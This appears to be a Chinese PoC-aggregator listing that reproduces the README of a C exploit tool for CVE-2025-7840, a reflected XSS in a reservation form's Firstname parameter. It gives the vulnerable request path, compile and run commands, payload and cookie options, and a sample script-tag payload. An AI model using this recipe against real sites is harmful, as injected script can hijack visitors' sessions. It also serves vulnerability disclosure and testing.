关联漏洞
描述
Proof‑of‑concept exploit for CVE‑2025‑7840 that injects malicious payloads into the Firstname parameter of a reservation form to trigger XSS
介绍
# XSS Exploit for CVE-2025-7840
**Author**: Byte Reaper (@ByteReaper0)
## Description
Proof‑of‑concept exploit for **CVE-2025-7840**, targeting a vulnerable web application endpoint that fails to sanitize user input on the `Firstname` parameter of a reservation form. By crafting a GET request to:
```
/index.php?page=reserve&Firstname=<payload>&Lastname=test
```
an attacker can inject and execute arbitrary JavaScript in the victim’s browser when the response is rendered.
## Features
* Inject custom payloads with `-b` option
* Handle cookie-based sessions via `-c` option
* Verbose logging for request/response analysis (`-v`)
* Built-in set of common XSS payloads
## Requirements
* Linux or macOS
* GCC (or compatible C compiler)
* `libcurl` development headers
* `argparse` library for C
## Installation
1. Compile the exploit:
```
gcc -o exploit exploit.c argparse.c -lcurl
```
## Usage
```
sudo ./exploit -u <TARGET_URL> [options]
```
### Options
| Flag | Description |
| ------------ | -------------------------------------------- |
| `-u` URL | Target base URL (e.g. `http://victim.local`) |
| `-b` PAYLOAD | Custom XSS payload to inject |
| `-c` FILE | Cookie jar file to use for session handling |
| `-v` | Verbose mode (show request/response details) |
### Examples
* Run default payloads against a target:
```
sudo ./exploit -u http://victim.local
```
* Use a custom payload:
```
sudo ./exploit -u http://victim.local -b "<script>alert(\'PWNED\')</script>"
```
* Include session cookies and verbose output:
```
sudo ./exploit -u http://victim.local -c cookies.txt -v
```
## Disclaimer
This code is provided for educational and testing purposes only. Unauthorized use against systems you do not own or have explicit permission to test is illegal and unethical.
## References
* CVE-2025-7840: XSS in reservation form
* Author Telegram: @ByteReaper0
## LICENSE:
MIT
文件快照
[4.0K] /data/pocs/484ac3b0c0b75e6351583ecf3c100e458f9a76fd
├── [ 16K] exploit.c
├── [1.0K] LICENSE
└── [2.0K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。